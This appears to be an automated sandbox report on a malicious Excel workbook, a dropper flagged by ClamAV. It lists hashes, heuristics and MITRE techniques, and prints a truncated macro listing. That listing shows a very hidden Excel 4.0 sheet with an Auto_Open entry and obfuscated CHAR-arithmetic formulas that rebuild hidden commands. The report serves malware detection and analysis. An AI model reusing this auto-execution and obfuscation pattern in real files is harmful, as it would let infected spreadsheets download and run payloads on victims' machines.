Office (OLE) malware analysis — malicious · 5af3bdbe31bf60dd

MALICIOUS

Office (OLE)

192.0 KB Created: 2020-04-10 06:53:37 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: bf1efbdca05fab7682b9da5b800c2d4c SHA-1: e57949811523eed8ab9321394a537bb909eaa7e7 SHA-256: 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel file contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous functions like RUN. ClamAV identifies this as Xls.Dropper.Agent-7693286-0, indicating its function as a dropper. The macro's structure suggests it is designed to download and execute a secondary payload.

Heuristics 5

ClamAV: Xls.Dropper.Agent-7693286-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7693286-0
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.microsoft.com/photo/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 22486 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	22486 bytes
SHA-256: `036ffc6cf9eb96c0e0577bd07bdb650d93d04568ab238dc75e902b8bf2196453`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - 8zH01dEBU ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!X1 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' 8zH01dEBU,X1,"FORMULA(DAY(NOW())+7,X33)","" ' 8zH01dEBU,X2,"FORMULA(CHAR(A1-X33)&CHAR(A2-X33)&CHAR(A3-X33)&CHAR(A4-X33)&CHAR(A5-X33)&CHAR(A6-X33)&CHAR(A7-X33)&CHAR(A8-X33)&CHAR(A9-X33)&CHAR(A10-X33)&CHAR(A11-X33)&CHAR(A12-X33)&CHAR(A13-X33)&CHAR(A14-X33)&CHAR(A15-X33)&CHAR(A16-X33)&CHAR(A17-X33)&CHAR(A18-X33)&CHAR(A19-X33)&CHAR(A20-X33)&CHAR(A21-X33)&CHAR(A22-X33)&CHAR(A23-X33)&CHAR(A24-X33)&CHAR(A25-X33)&CHAR(A26-X33)&CHAR(A27-X33)&CHAR(A28-X33)&CHAR(A29-X33)&CHAR(A30-X33)&CHAR(A31-X33)&CHAR(A32-X33)&CHAR(A33-X33)&CHAR(A34-X33)&CHAR(A35-X33)&CHAR(A36-X33)&CHAR(A37-X33)&CHAR(A38-X33)&CHAR(A39-X33)&CHAR(A40-X33),Y1)","" ' 8zH01dEBU,X3,"FORMULA(CHAR(B1-X33)&CHAR(B2-X33)&CHAR(B3-X33)&CHAR(B4-X33)&CHAR(B5-X33)&CHAR(B6-X33)&CHAR(B7-X33)&CHAR(B8-X33)&CHAR(B9-X33)&CHAR(B10-X33)&CHAR(B11-X33)&CHAR(B12-X33)&CHAR(B13-X33)&CHAR(B14-X33)&CHAR(B15-X33)&CHAR(B16-X33)&CHAR(B17-X33)&CHAR(B18-X33)&CHAR(B19-X33)&CHAR(B20-X33)&CHAR(B21-X33)&CHAR(B22-X33)&CHAR(B23-X33)&CHAR(B24-X33)&CHAR(B25-X33)&CHAR(B26-X33)&CHAR(B27-X33)&CHAR(B28-X33)&CHAR(B29-X33)&CHAR(B30-X33)&CHAR(B31-X33)&CHAR(B32-X33)&CHAR(B33-X33)&CHAR(B34-X33)&CHAR(B35-X33)&CHAR(B36-X33)&CHAR(B37-X33)&CHAR(B38-X33)&CHAR(B39-X33)&CHAR(B40-X33),Y2)","" ' 8zH01dEBU,X4,"FORMULA(CHAR(C1-X33)&CHAR(C2-X33)&CHAR(C3-X33)&CHAR(C4-X33)&CHAR(C5-X33)&CHAR(C6-X33)&CHAR(C7-X33)&CHAR(C8-X33)&CHAR(C9-X33)&CHAR(C10-X33)&CHAR(C11-X33)&CHAR(C12-X33)&CHAR(C13-X33)&CHAR(C14-X33)&CHAR(C15-X33)&CHAR(C16-X33)&CHAR(C17-X33)&CHAR(C18-X33)&CHAR(C19-X33)&CHAR(C20-X33)&CHAR(C21-X33)&CHAR(C22-X33)&CHAR(C23-X33)&CHAR(C24-X33)&CHAR(C25-X33)&CHAR(C26-X33)&CHAR(C27-X33)&CHAR(C28-X33)&CHAR(C29-X33)&CHAR(C30-X33)&CHAR(C31-X33)&CHAR(C32-X33)&CHAR(C33-X33)&CHAR(C34-X33)&CHAR(C35-X33),Y3)","" ' 8zH01dEBU,X5,"FORMULA(CHAR(D1-X33)&CHAR(D2-X33)&CHAR(D3-X33)&CHAR(D4-X33)&CHAR(D5-X33)&CHAR(D6-X33)&CHAR(D7-X33)&CHAR(D8-X33)&CHAR(D9-X33)&CHAR(D10-X33)&CHAR(D11-X33)&CHAR(D12-X33)&CHAR(D13-X33)&CHAR(D14-X33)&CHAR(D15-X33)&CHAR(D16-X33)&CHAR(D17-X33)&CHAR(D18-X33)&CHAR(D19-X33)&CHAR(D20-X33)&CHAR(D21-X33)&CHAR(D22-X33)&CHAR(D23-X33)&CHAR(D24-X33)&CHAR(D25-X33)&CHAR(D26-X33)&CHAR(D27-X33)&CHAR(D28-X33)&CHAR(D29-X33)&CHAR(D30-X33)&CHAR(D31-X33)&CHAR(D32-X33)&CHAR(D33-X33)&CHAR(D34-X33)&CHAR(D35-X33),Y4)","" ' 8zH01dEBU,X6,"FORMULA(CHAR(E1-X33)&CHAR(E2-X33)&CHAR(E3-X33)&CHAR(E4-X33)&CHAR(E5-X33)&CHAR(E6-X33)&CHAR(E7-X33)&CHAR(E8-X33)&CHAR(E9-X33)&CHAR(E10-X33)&CHAR(E11-X33)&CHAR(E12-X33)&CHAR(E13-X33)&CHAR(E14-X33)&CHAR(E15-X33)&CHAR(E16-X33)&CHAR(E17-X33)&CHAR(E18-X33)&CHAR(E19-X33)&CHAR(E20-X33)&CHAR(E21-X33)&CHAR(E22-X33)&CHAR(E23-X33)&CHAR(E24-X33)&CHAR(E25-X33)&CHAR(E26-X33)&CHAR(E27-X33)&CHAR(E28-X33)&CHAR(E29-X33)&CHAR(E30-X33)&CHAR(E31-X33)&CHAR(E32-X33)&CHAR(E33-X33)&CHAR(E34-X33)&CHAR(E35-X33)&CHAR(E36-X33)&CHAR(E37-X33)&CHAR(E38-X33)&CHAR(E39-X33)&CHAR(E40-X33)&CHAR(E41-X33)&CHAR(E42-X33)&CHAR(E43-X33)&CHAR(E44-X33)&CHAR(E45-X33)&CHAR(E46-X33)&CHAR(E47-X33)&CHAR(E48-X33)&CHAR(E49-X33)&CHAR(E50-X33)&CHAR(E51-X33)&CHAR(E52-X33)&CHAR(E53-X33)&CHAR(E54-X33)&CHAR(E55-X33)&CHAR(E56-X33)&CHAR(E57-X33)&CHAR(E58-X33)&CHAR(E59-X33)&CHAR(E60-X33)&CHAR(E61-X33)&CHAR(E62-X33),Y5)","" ' 8zH01dEBU,X7,"FORMULA(CHAR(F1-X33)&CHAR(F2-X33)&CHAR(F3-X33)&CHAR( ... (truncated)

SHA-256: 036ffc6cf9eb96c0e0577bd07bdb650d93d04568ab238dc75e902b8bf2196453

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden -  8zH01dEBU
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!X1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  8zH01dEBU,X1,"FORMULA(DAY(NOW())+7,X33)",""
'  8zH01dEBU,X2,"FORMULA(CHAR(A1-X33)&CHAR(A2-X33)&CHAR(A3-X33)&CHAR(A4-X33)&CHAR(A5-X33)&CHAR(A6-X33)&CHAR(A7-X33)&CHAR(A8-X33)&CHAR(A9-X33)&CHAR(A10-X33)&CHAR(A11-X33)&CHAR(A12-X33)&CHAR(A13-X33)&CHAR(A14-X33)&CHAR(A15-X33)&CHAR(A16-X33)&CHAR(A17-X33)&CHAR(A18-X33)&CHAR(A19-X33)&CHAR(A20-X33)&CHAR(A21-X33)&CHAR(A22-X33)&CHAR(A23-X33)&CHAR(A24-X33)&CHAR(A25-X33)&CHAR(A26-X33)&CHAR(A27-X33)&CHAR(A28-X33)&CHAR(A29-X33)&CHAR(A30-X33)&CHAR(A31-X33)&CHAR(A32-X33)&CHAR(A33-X33)&CHAR(A34-X33)&CHAR(A35-X33)&CHAR(A36-X33)&CHAR(A37-X33)&CHAR(A38-X33)&CHAR(A39-X33)&CHAR(A40-X33),Y1)",""
'  8zH01dEBU,X3,"FORMULA(CHAR(B1-X33)&CHAR(B2-X33)&CHAR(B3-X33)&CHAR(B4-X33)&CHAR(B5-X33)&CHAR(B6-X33)&CHAR(B7-X33)&CHAR(B8-X33)&CHAR(B9-X33)&CHAR(B10-X33)&CHAR(B11-X33)&CHAR(B12-X33)&CHAR(B13-X33)&CHAR(B14-X33)&CHAR(B15-X33)&CHAR(B16-X33)&CHAR(B17-X33)&CHAR(B18-X33)&CHAR(B19-X33)&CHAR(B20-X33)&CHAR(B21-X33)&CHAR(B22-X33)&CHAR(B23-X33)&CHAR(B24-X33)&CHAR(B25-X33)&CHAR(B26-X33)&CHAR(B27-X33)&CHAR(B28-X33)&CHAR(B29-X33)&CHAR(B30-X33)&CHAR(B31-X33)&CHAR(B32-X33)&CHAR(B33-X33)&CHAR(B34-X33)&CHAR(B35-X33)&CHAR(B36-X33)&CHAR(B37-X33)&CHAR(B38-X33)&CHAR(B39-X33)&CHAR(B40-X33),Y2)",""
'  8zH01dEBU,X4,"FORMULA(CHAR(C1-X33)&CHAR(C2-X33)&CHAR(C3-X33)&CHAR(C4-X33)&CHAR(C5-X33)&CHAR(C6-X33)&CHAR(C7-X33)&CHAR(C8-X33)&CHAR(C9-X33)&CHAR(C10-X33)&CHAR(C11-X33)&CHAR(C12-X33)&CHAR(C13-X33)&CHAR(C14-X33)&CHAR(C15-X33)&CHAR(C16-X33)&CHAR(C17-X33)&CHAR(C18-X33)&CHAR(C19-X33)&CHAR(C20-X33)&CHAR(C21-X33)&CHAR(C22-X33)&CHAR(C23-X33)&CHAR(C24-X33)&CHAR(C25-X33)&CHAR(C26-X33)&CHAR(C27-X33)&CHAR(C28-X33)&CHAR(C29-X33)&CHAR(C30-X33)&CHAR(C31-X33)&CHAR(C32-X33)&CHAR(C33-X33)&CHAR(C34-X33)&CHAR(C35-X33),Y3)",""
'  8zH01dEBU,X5,"FORMULA(CHAR(D1-X33)&CHAR(D2-X33)&CHAR(D3-X33)&CHAR(D4-X33)&CHAR(D5-X33)&CHAR(D6-X33)&CHAR(D7-X33)&CHAR(D8-X33)&CHAR(D9-X33)&CHAR(D10-X33)&CHAR(D11-X33)&CHAR(D12-X33)&CHAR(D13-X33)&CHAR(D14-X33)&CHAR(D15-X33)&CHAR(D16-X33)&CHAR(D17-X33)&CHAR(D18-X33)&CHAR(D19-X33)&CHAR(D20-X33)&CHAR(D21-X33)&CHAR(D22-X33)&CHAR(D23-X33)&CHAR(D24-X33)&CHAR(D25-X33)&CHAR(D26-X33)&CHAR(D27-X33)&CHAR(D28-X33)&CHAR(D29-X33)&CHAR(D30-X33)&CHAR(D31-X33)&CHAR(D32-X33)&CHAR(D33-X33)&CHAR(D34-X33)&CHAR(D35-X33),Y4)",""
'  8zH01dEBU,X6,"FORMULA(CHAR(E1-X33)&CHAR(E2-X33)&CHAR(E3-X33)&CHAR(E4-X33)&CHAR(E5-X33)&CHAR(E6-X33)&CHAR(E7-X33)&CHAR(E8-X33)&CHAR(E9-X33)&CHAR(E10-X33)&CHAR(E11-X33)&CHAR(E12-X33)&CHAR(E13-X33)&CHAR(E14-X33)&CHAR(E15-X33)&CHAR(E16-X33)&CHAR(E17-X33)&CHAR(E18-X33)&CHAR(E19-X33)&CHAR(E20-X33)&CHAR(E21-X33)&CHAR(E22-X33)&CHAR(E23-X33)&CHAR(E24-X33)&CHAR(E25-X33)&CHAR(E26-X33)&CHAR(E27-X33)&CHAR(E28-X33)&CHAR(E29-X33)&CHAR(E30-X33)&CHAR(E31-X33)&CHAR(E32-X33)&CHAR(E33-X33)&CHAR(E34-X33)&CHAR(E35-X33)&CHAR(E36-X33)&CHAR(E37-X33)&CHAR(E38-X33)&CHAR(E39-X33)&CHAR(E40-X33)&CHAR(E41-X33)&CHAR(E42-X33)&CHAR(E43-X33)&CHAR(E44-X33)&CHAR(E45-X33)&CHAR(E46-X33)&CHAR(E47-X33)&CHAR(E48-X33)&CHAR(E49-X33)&CHAR(E50-X33)&CHAR(E51-X33)&CHAR(E52-X33)&CHAR(E53-X33)&CHAR(E54-X33)&CHAR(E55-X33)&CHAR(E56-X33)&CHAR(E57-X33)&CHAR(E58-X33)&CHAR(E59-X33)&CHAR(E60-X33)&CHAR(E61-X33)&CHAR(E62-X33),Y5)",""
'  8zH01dEBU,X7,"FORMULA(CHAR(F1-X33)&CHAR(F2-X33)&CHAR(F3-X33)&CHAR(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.